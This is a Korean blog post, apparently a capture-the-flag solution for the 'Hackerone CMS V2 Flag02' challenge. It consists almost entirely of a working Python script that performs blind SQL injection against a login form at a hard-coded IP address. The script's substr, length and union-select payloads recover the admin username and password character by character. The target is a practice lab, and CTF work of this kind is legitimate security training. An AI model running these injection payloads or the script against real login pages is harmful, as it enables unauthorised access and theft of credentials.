Hackerone CMS V2 Flag02

2020. 6. 29. 04:150x0B Web Hacking

728x90
import requests
import urllib3
import string # ascii_letters
import random
import sys

urllib3.disable_warnings()

rp = requests.post
url ="http://35.227.24.107/b85e1bbddf/login"
brute = string.ascii_letters
#brute = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
# username : [] 
# password : []

#username length : 7
#password length : 9
def substr_data(data,len,target):
    index = 1 
    valid = []
    print(f"{data}")
    
    while(index < int(len)+1):
        for d in data:
                LOGIN_DATA ={
                    'username' : f"' or substr({target},{index},1)='{d}' #",
                    'password' : "1"
                
                }
                res = rp(url,LOGIN_DATA,verify=False)
                if(res.text.count("Invalid password") != 0):
                    print(f"good ! {d}")
                    valid.append(d)
                    index+=1
                    
    return valid
def length(data):
    valid = []
    for i in range(1,100):
        LOGIN_DATA = {
            'username' : f"' or length({data})={i}#",
            'password' : "1" 
        }
        res = rp(url,LOGIN_DATA,verify=False)
        #print(LOGIN_DATA.values())
        if(res.text.count("Invalid password") != 0):
            break
    return i

def bruteforce(data):
    valid = []
    
    for ch in brute:    
        
        LOGIN_DATA = { 
            'username': f"' union select {data} from admins where {data} LIKE '%{ch}%' and '1'='1' -- ", 
            'password': '1' 
        }
        #print(LOGIN_DATA.values())
        res = rp(url,data=LOGIN_DATA,verify=False)
        if(res.text.count("Invalid password") != 0):
            valid.append(ch)
            
    return valid
if __name__ == '__main__':
        
    print("[+] Hackerone CMS V2 Flag 02")
    
    '''
    id_len = length("username")
    print(f"username length = {id_len}")
    pw_len = length("password")
    print(f"password length = {pw_len}")
    user_data = bruteforce("username")
    print(f"username list = {user_data}")
    pass_data = bruteforce("password")
    print(f"password list = {pass_data}")
    '''
    
    
    id_len = '7'
    pw_len = '9'
    user_data = ['d', 'e', 'l', 'r', 'v']
    pass_data = ['a', 'c', 'e', 'i', 'k', 'm', 'n', 'z']
    
    s=""
    real_user = substr_data(user_data,id_len,"username")
    print(f"real username = {s.join(real_user)}")
    real_pwd = substr_data(pass_data,pw_len,"password")
    print(f"real password = {s.join(real_pwd)}")
저작자표시

'0x0B Web Hacking' 카테고리의 다른 글

크롤링 2020 트능(트렌드 능력고사)  (0) 2020.07.14
sqli practice  (0) 2020.07.14
HackerFactory 10번문제  (0) 2020.01.25
Hacker Factory 7번문제  (0) 2020.01.25
Hacker Factory 4번문제  (0) 2020.01.25

관련글

티스토리툴바